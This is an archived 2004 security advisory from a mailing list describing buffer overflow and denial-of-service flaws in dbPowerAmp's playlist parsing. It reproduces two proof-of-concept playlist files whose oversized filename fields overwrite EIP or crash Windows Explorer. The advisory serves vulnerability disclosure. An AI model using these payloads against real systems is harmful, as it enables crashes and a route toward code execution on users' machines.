Network Security: Detailed info on [NT] dbPowerAmp Buffer Overflow and DoS Vulnerabilities

Subject:	[NT] dbPowerAmp Buffer Overflow and DoS Vulnerabilities
Date:	4 Oct 2004 13:54:57 +0200

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  dbPowerAmp Buffer Overflow and DoS Vulnerabilities
------------------------------------------------------------------------


SUMMARY

Often called the Swiss Army knife of audio,  <http://www.dbpoweramp.com> 
dMC can digitally rip sound from audio CDs to a multitude of formats. 
Convert from one format to another while preserving ID tags. Nearly every 
audio type is supported, including MP3, MP4, Windows Media Audio (WMA), 
OGG Vorbis, AAC, Monkey's Audio, and FLAC (with optional installs from 
Codec Central).

Both the very popular dbPowerAmp Music Converter application, as well as 
the dbPowerAmp Player are prone to buffer overflow conditions when parsing 
the filename field of a playlist file.

DETAILS

Vulnerable Systems:
 * dbPowerAmp Music Converter and player, all versions

Buffer Overflows
While parsing m3u and pls playlist files, dbPowerAmp allocates only 215 
bytes for handling of the filename in a playlist. By creating a specially 
playlist file it is easily possible to overwrite EIP due to the nature of 
the buffer overflow. Example:
[playlist]
NumberOfEntries=1
File1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBB
Title1=GulfTech dbPowerAmp Music Converter POC
Length1=-1


Note: For the player and the playlist editor a different value is used. A 
value of 265 bytes is sufficient to overwrite the return address. There is 
no reason to believe that other playlist file types are not plagued with 
the same issue (i.e: mcc files, or Music Converter Collection files.)

Denial Of Service
The music converter has an advanced option which allows it to be 
integrated into the Windows Shell. A malformed playlist file will 
automatically cause a DoS condition for the Windows Shell, even if the 
playlist isn't opened. It is sufficient to move the mouse cursor above it. 
A sample of such a playlist can look something similar to:
[playlist]
NumberOfEntries=1
File1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Title1=GulfTech dbPowerAmp Music Converter Crash POC
Length1=-1

The large filename entry in the playlist will overwrite EDI with junk and 
then cause an access violation. This will then cause Explorer to crash.

A proof of concept can be obtained from  
<http://www.gulftech.org/downloads/?file_id=00022> 
http://www.gulftech.org/downloads/?file_id=00022


ADDITIONAL INFORMATION

The information has been provided by  <mailto:security@gulftech.org> 
GulfTech Security.
The original article can be found at:  
<http://www.gulftech.org/?node=research&article_id=00052-09272004> 
http://www.gulftech.org/?node=research&article_id=00052-09272004



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.

<Prev in Thread]	Current Thread	[Next in Thread>
[NT] dbPowerAmp Buffer Overflow and DoS Vulnerabilities, SecuriTeam <=

Previous by Date:	[NT] Remote Buffer overflow Vulnerability in YPOPs!, SecuriTeam
Next by Date:	[NT] Judge Dredd Vs. Death Format String Vulnerability, SecuriTeam
Previous by Thread:	[NT] Remote Buffer overflow Vulnerability in YPOPs!, SecuriTeam
Next by Thread:	[NT] Judge Dredd Vs. Death Format String Vulnerability, SecuriTeam
Indexes:	[Date] [Thread] [Top] [All Lists]